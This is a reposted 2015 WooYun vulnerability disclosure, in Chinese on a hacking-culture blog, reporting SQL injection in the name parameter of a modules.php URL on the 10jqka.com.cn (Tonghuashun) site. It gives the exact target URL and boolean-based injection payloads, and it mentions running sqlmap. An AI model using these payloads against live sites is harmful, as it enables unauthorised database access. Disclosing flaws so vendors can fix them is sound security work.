记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

同花顺主站SQL注入另一枚

2015-08-11 09:30

http://www.10jqka.com.cn:80/modules.php?file=logout&name=trade&placeholder=1

name参数值存在注入。

直接访问说功能不存在。

0.jpg



http://www.10jqka.com.cn:80/modules.php?file=logout&name=trade' and 'a'='a&placeholder=1

返回如下:

2.jpg



http://www.10jqka.com.cn:80/modules.php?file=logout&name=trade' and 'a'='b&placeholder=1

返回如下:

3.jpg



扔sqlmap

1.jpg

漏洞证明:

如上。

修复方案:

求不忽略,谢谢。


知识来源: www.wooyun.org/bugs/wooyun-2015-0132261

阅读:298049 | 评论:0 | 标签:注入

想收藏或者和大家分享这篇好文章→复制链接地址

“同花顺主站SQL注入另一枚”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

❤人人都能成为掌握黑客技术的英雄⛄️

ADS

标签云

本页关键词